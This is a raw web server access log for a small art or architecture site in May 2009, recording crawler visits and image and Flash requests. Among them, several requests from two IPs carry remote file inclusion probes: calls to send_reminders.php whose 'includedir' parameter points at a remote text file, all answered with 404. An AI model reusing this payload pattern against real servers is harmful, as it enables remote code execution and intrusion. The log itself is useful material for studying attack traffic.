91.106.32.202 - - [12/May/2009:10:24:40 +0100] "GET /o11.jpg HTTP/1.1" 200 58591 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9" 380 58953
91.106.32.202 - - [12/May/2009:10:24:42 +0100] "GET /o12.jpg HTTP/1.1" 404 354 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9" 380 637
91.106.32.202 - - [12/May/2009:10:24:44 +0100] "GET /o13.jpg HTTP/1.1" 200 76280 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.9) Gecko/2009040821 Firefox/3.0.9" 380 76642
66.249.65.103 - - [12/May/2009:10:59:12 +0100] "GET /o5.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 234 256
66.249.65.103 - - [12/May/2009:11:05:25 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.65.103 - - [12/May/2009:11:05:26 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 49891 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 50252
66.249.71.144 - - [12/May/2009:11:44:18 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [12/May/2009:11:44:18 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1624
74.6.17.154 - - [12/May/2009:12:51:27 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [12/May/2009:12:51:27 +0100] "GET /log/?N=D HTTP/1.0" 200 3184 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 373 3418
66.249.71.144 - - [12/May/2009:14:27:34 +0100] "GET /webalizer/usage_200809.html HTTP/1.1" 200 148760 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 149123
66.249.71.144 - - [12/May/2009:16:17:47 +0100] "GET /yellowdrag.swf HTTP/1.1" 404 361 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 245 645
66.249.71.144 - - [12/May/2009:16:17:48 +0100] "GET /log/dnscache.db HTTP/1.1" 200 1339392 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 246 1339757
66.249.71.144 - - [12/May/2009:17:55:34 +0100] "GET /feidad.html HTTP/1.1" 200 820 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 242 1178
220.181.61.234 - - [12/May/2009:18:31:36 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
216.129.119.14 - - [12/May/2009:22:50:31 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
66.249.71.144 - - [12/May/2009:23:52:37 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [12/May/2009:23:52:37 +0100] "GET /webalizer//usage_200807.html HTTP/1.1" 200 151253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 259 151616
219.142.53.31 - - [13/May/2009:00:20:30 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "renlifangbot/1.0 (+http://search.msn.com/msnbot.htm)" 163 603
219.142.53.29 - - [13/May/2009:00:20:31 +0100] "GET / HTTP/1.0" 200 1266 "-" "renlifangbot/1.0 (+http://search.msn.com/msnbot.htm)" 229 1587
82.231.225.184 - - [13/May/2009:00:47:28 +0100] "GET / HTTP/1.1" 200 1266 "http://www.rhizome.org/object.php?o=45901&m=1045445" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 346 1625
82.231.225.184 - - [13/May/2009:00:47:28 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 329 226046
82.231.225.184 - - [13/May/2009:00:47:28 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 335 154123
82.231.225.184 - - [13/May/2009:00:47:31 +0100] "GET /feidad.html HTTP/1.1" 200 820 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 599 1177
82.231.225.184 - - [13/May/2009:00:47:31 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://www.decodeine.com/feidad.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 372 7503734
82.231.225.184 - - [13/May/2009:00:48:07 +0100] "GET /o1.jpg HTTP/1.1" 200 258267 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 396 258631
82.231.225.184 - - [13/May/2009:00:48:10 +0100] "GET /o2.jpg HTTP/1.1" 200 216322 "http://www.decodeine.com/o1.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 393 216685
82.231.225.184 - - [13/May/2009:00:48:11 +0100] "GET /o3.jpg HTTP/1.1" 200 153363 "http://www.decodeine.com/o2.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 393 153726
82.231.225.184 - - [13/May/2009:00:48:12 +0100] "GET /o4.jpg HTTP/1.1" 200 34271 "http://www.decodeine.com/o3.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 393 34632
82.231.225.184 - - [13/May/2009:00:48:14 +0100] "GET /o5.jpg HTTP/1.1" 200 60308 "http://www.decodeine.com/o4.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 393 60670
82.231.225.184 - - [13/May/2009:00:48:18 +0100] "GET /o13.jpg HTTP/1.1" 200 76280 "http://www.decodeine.com/o5.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 394 76642
82.231.225.184 - - [13/May/2009:00:48:21 +0100] "GET /o12.jpg HTTP/1.1" 404 354 "http://www.decodeine.com/o13.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 395 637
82.231.225.184 - - [13/May/2009:00:48:22 +0100] "GET /o11.jpg HTTP/1.1" 200 58591 "http://www.decodeine.com/o13.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 395 58953
82.231.225.184 - - [13/May/2009:00:48:25 +0100] "GET /o10.jpg HTTP/1.1" 200 59922 "http://www.decodeine.com/o11.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 395 60284
82.231.225.184 - - [13/May/2009:00:48:26 +0100] "GET /o9.jpg HTTP/1.1" 200 142448 "http://www.decodeine.com/o10.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 394 142812
82.231.225.184 - - [13/May/2009:00:48:28 +0100] "GET /o8.jpg HTTP/1.1" 200 221331 "http://www.decodeine.com/o9.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 393 221695
82.231.225.184 - - [13/May/2009:00:48:29 +0100] "GET /o7.jpg HTTP/1.1" 200 129833 "http://www.decodeine.com/o8.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 393 130197
82.231.225.184 - - [13/May/2009:00:48:33 +0100] "GET /o6.jpg HTTP/1.1" 200 70616 "http://www.decodeine.com/o7.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 393 70979
82.231.225.184 - - [13/May/2009:00:53:33 +0100] "GET /hs01.jpg HTTP/1.1" 200 58624 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 398 58986
82.231.225.184 - - [13/May/2009:00:53:34 +0100] "GET /hs11.jpg HTTP/1.1" 200 151835 "http://www.decodeine.com/hs01.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 152198
82.231.225.184 - - [13/May/2009:00:53:36 +0100] "GET /hs02.jpg HTTP/1.1" 200 24937 "http://www.decodeine.com/hs11.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 25298
82.231.225.184 - - [13/May/2009:00:53:37 +0100] "GET /hs12.jpg HTTP/1.1" 200 143988 "http://www.decodeine.com/hs02.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 144351
82.231.225.184 - - [13/May/2009:00:53:38 +0100] "GET /hs13.jpg HTTP/1.1" 200 50131 "http://www.decodeine.com/hs12.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 50492
82.231.225.184 - - [13/May/2009:00:53:40 +0100] "GET /hs14.jpg HTTP/1.1" 200 169029 "http://www.decodeine.com/hs13.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 169392
82.231.225.184 - - [13/May/2009:00:53:41 +0100] "GET /hs16.jpg HTTP/1.1" 200 157251 "http://www.decodeine.com/hs14.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 157614
82.231.225.184 - - [13/May/2009:00:53:43 +0100] "GET /hs07.jpg HTTP/1.1" 200 49592 "http://www.decodeine.com/hs16.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 49953
82.231.225.184 - - [13/May/2009:00:53:45 +0100] "GET /hs09.jpg HTTP/1.1" 200 39779 "http://www.decodeine.com/hs07.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 40140
82.231.225.184 - - [13/May/2009:00:53:47 +0100] "GET /hs19.jpg HTTP/1.1" 200 125900 "http://www.decodeine.com/hs09.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)" 397 126263
66.249.71.144 - - [13/May/2009:01:06:29 +0100] "GET /webalizer/usage_200607.html HTTP/1.1" 200 106726 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 107089
66.249.71.144 - - [13/May/2009:01:06:30 +0100] "GET /webalizer/usage_200703.html HTTP/1.1" 200 110824 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 111186
66.249.71.144 - - [13/May/2009:04:10:08 +0100] "GET /log/web.log.4 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 255
66.249.71.144 - - [13/May/2009:04:27:27 +0100] "GET /webalizer/usage_200807.html HTTP/1.1" 200 151253 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 151617
66.249.71.144 - - [13/May/2009:06:18:42 +0100] "GET /webalizer/usage_200711.html HTTP/1.1" 200 149412 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 149776
124.115.0.160 - - [13/May/2009:07:45:34 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
124.115.0.160 - - [13/May/2009:07:45:34 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 243 1625
208.80.195.34 - - [13/May/2009:08:12:19 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; PCM_06g)" 116 1587
66.249.71.144 - - [13/May/2009:09:15:19 +0100] "GET /adaptation10.swf HTTP/1.1" 404 363 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 247 647
66.249.71.144 - - [13/May/2009:10:01:07 +0100] "GET /log/ HTTP/1.1" 200 3184 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 235 3456
66.235.124.4 - - [13/May/2009:10:39:54 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 221 641
66.235.124.4 - - [13/May/2009:10:40:09 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 246 1587
66.249.71.144 - - [13/May/2009:11:04:30 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 86741 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 87104
77.88.26.26 - - [13/May/2009:19:19:35 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yandex/1.01.001 (compatible; Win16; I)" 155 641
77.88.26.26 - - [13/May/2009:19:19:37 +0100] "GET / HTTP/1.1" 200 1266 "-" "Yandex/1.01.001 (compatible; Win16; I)" 450 1624
66.249.71.144 - - [13/May/2009:19:46:17 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [13/May/2009:19:46:17 +0100] "GET /webalizer/usage_200903.html HTTP/1.1" 200 154792 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 155154
217.150.241.141 - - [13/May/2009:20:49:42 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "blackcrawl/Nutch-0.9 (crawl for fun; www.zipfelchappe.com; zipfelchappe@localhost)" 180 603
217.150.241.141 - - [13/May/2009:20:49:43 +0100] "GET / HTTP/1.0" 200 1266 "-" "blackcrawl/Nutch-0.9 (crawl for fun; www.zipfelchappe.com; zipfelchappe@localhost)" 170 1587
216.129.119.14 - - [14/May/2009:01:53:08 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
161.130.178.232 - - [14/May/2009:04:33:58 +0100] "GET /o6.jpg HTTP/1.1" 200 70616 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=96&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Dfrank%2Bgehry%2Bhouse%2Baxonometric%26ndsp%3D21%26hl%3Den%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26hs%3DZ2R%26sa%3DN%26start%3D84%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 845 70980
161.130.178.232 - - [14/May/2009:04:33:30 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=96&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Dfrank%2Bgehry%2Bhouse%2Baxonometric%26ndsp%3D21%26hl%3Den%26client%3Dfirefox-a%26rls%3Dorg.mozilla:en-US:official%26hs%3DZ2R%26sa%3DN%26start%3D84%26um%3D1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 848 7503735
161.130.178.232 - - [14/May/2009:04:34:53 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 357 642
161.130.178.232 - - [14/May/2009:04:35:03 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 357 641
161.130.178.232 - - [14/May/2009:04:35:27 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 357 642
161.130.178.232 - - [14/May/2009:04:41:31 +0100] "GET /favicon.ico HTTP/1.1" 404 358 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 357 642
161.130.178.232 - - [14/May/2009:04:41:47 +0100] "GET /hs01.jpg HTTP/1.1" 200 58624 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 58986
161.130.178.232 - - [14/May/2009:04:41:54 +0100] "GET /hs03.jpg HTTP/1.1" 200 117599 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 70080
161.130.178.232 - - [14/May/2009:04:41:55 +0100] "GET /hs04.jpg HTTP/1.1" 200 70913 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 35040
161.130.178.232 - - [14/May/2009:04:41:58 +0100] "GET /hsa1.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 639
161.130.178.232 - - [14/May/2009:04:41:59 +0100] "GET /hsa2.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 639
161.130.178.232 - - [14/May/2009:04:41:59 +0100] "GET /hsa3.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 638
161.130.178.232 - - [14/May/2009:04:41:59 +0100] "GET /hsa4.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 638
161.130.178.232 - - [14/May/2009:04:42:00 +0100] "GET /hsa5.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 638
161.130.178.232 - - [14/May/2009:04:42:00 +0100] "GET /hsa6.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 638
161.130.178.232 - - [14/May/2009:04:42:00 +0100] "GET /hsa7.jpg HTTP/1.1" 404 355 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 434 638
161.130.178.232 - - [14/May/2009:04:42:01 +0100] "GET /Water.avi HTTP/1.1" 404 356 "http://www.decodeine.com/dec4b.swf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20;MEGAUPLOAD 1.0" 480 639
124.115.4.194 - - [14/May/2009:07:55:03 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
208.80.195.51 - - [14/May/2009:09:10:57 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Hotbar 4.1.8.0)" 123 1587
66.249.71.144 - - [14/May/2009:11:05:32 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [14/May/2009:11:05:32 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 94880 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 95242
193.47.80.50 - - [14/May/2009:14:30:44 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [14/May/2009:14:30:44 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 250 1587
171.64.75.45 - - [14/May/2009:14:45:18 +0100] "GET /log/web.log.5//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 380 "-" "libwww-perl/5.805" 210 626
171.64.75.45 - - [14/May/2009:14:45:19 +0100] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 365 "-" "libwww-perl/5.805" 196 611
171.64.75.45 - - [14/May/2009:14:45:19 +0100] "GET /log//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 370 "-" "libwww-perl/5.805" 200 616
171.64.75.45 - - [14/May/2009:14:45:20 +0100] "GET /log/web.log.5//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 380 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" 229 626
171.64.75.45 - - [14/May/2009:14:45:20 +0100] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 365 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" 215 611
171.64.75.45 - - [14/May/2009:14:45:49 +0100] "GET /log/web.log.1//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 380 "-" "libwww-perl/5.805" 210 626
171.64.75.45 - - [14/May/2009:14:45:50 +0100] "GET /log/web.log.1//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 380 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" 229 626
171.64.75.45 - - [14/May/2009:14:46:07 +0100] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 365 "-" "libwww-perl/5.805" 196 611
217.147.29.190 - - [14/May/2009:14:46:37 +0100] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 365 "-" "libwww-perl/5.808" 196 611
217.147.29.190 - - [14/May/2009:14:46:47 +0100] "GET /log/web.log.5//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 380 "-" "libwww-perl/5.808" 210 626
217.147.29.190 - - [14/May/2009:14:46:52 +0100] "GET /log//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 370 "-" "libwww-perl/5.808" 200 616
217.147.29.190 - - [14/May/2009:14:47:58 +0100] "GET /log/web.log.5//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 380 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" 229 626
217.147.29.190 - - [14/May/2009:14:47:58 +0100] "GET //send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 365 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" 215 611
217.147.29.190 - - [14/May/2009:14:49:17 +0100] "GET /log/web.log.1//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 380 "-" "libwww-perl/5.808" 210 626
217.147.29.190 - - [14/May/2009:14:50:13 +0100] "GET /log/web.log.1//send_reminders.php?noSet=0&includedir=http://www.maskany.com/idomila.txt?? HTTP/1.1" 404 380 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" 229 626
66.249.71.144 - - [14/May/2009:15:41:54 +0100] "GET /o3.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0" 234 256
58.61.164.207 - - [14/May/2009:18:18:52 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 263 641
220.181.61.234 - - [14/May/2009:18:50:59 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
87.198.128.82 - - [14/May/2009:20:46:03 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko" 344 1625
87.198.128.82 - - [14/May/2009:20:46:03 +0100] "GET /indexbutton.jpg HTTP/1.1" 200 153759 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko" 365 154123
87.198.128.82 - - [14/May/2009:20:46:03 +0100] "GET /index.jpg HTTP/1.1" 200 225683 "http://www.decodeine.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9) Gecko" 359 226046
66.249.71.144 - - [15/May/2009:00:53:03 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [15/May/2009:00:53:03 +0100] "GET /log/error.log.1 HTTP/1.1" 200 4068 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 246 4427
66.235.124.4 - - [15/May/2009:02:18:05 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" 221 641
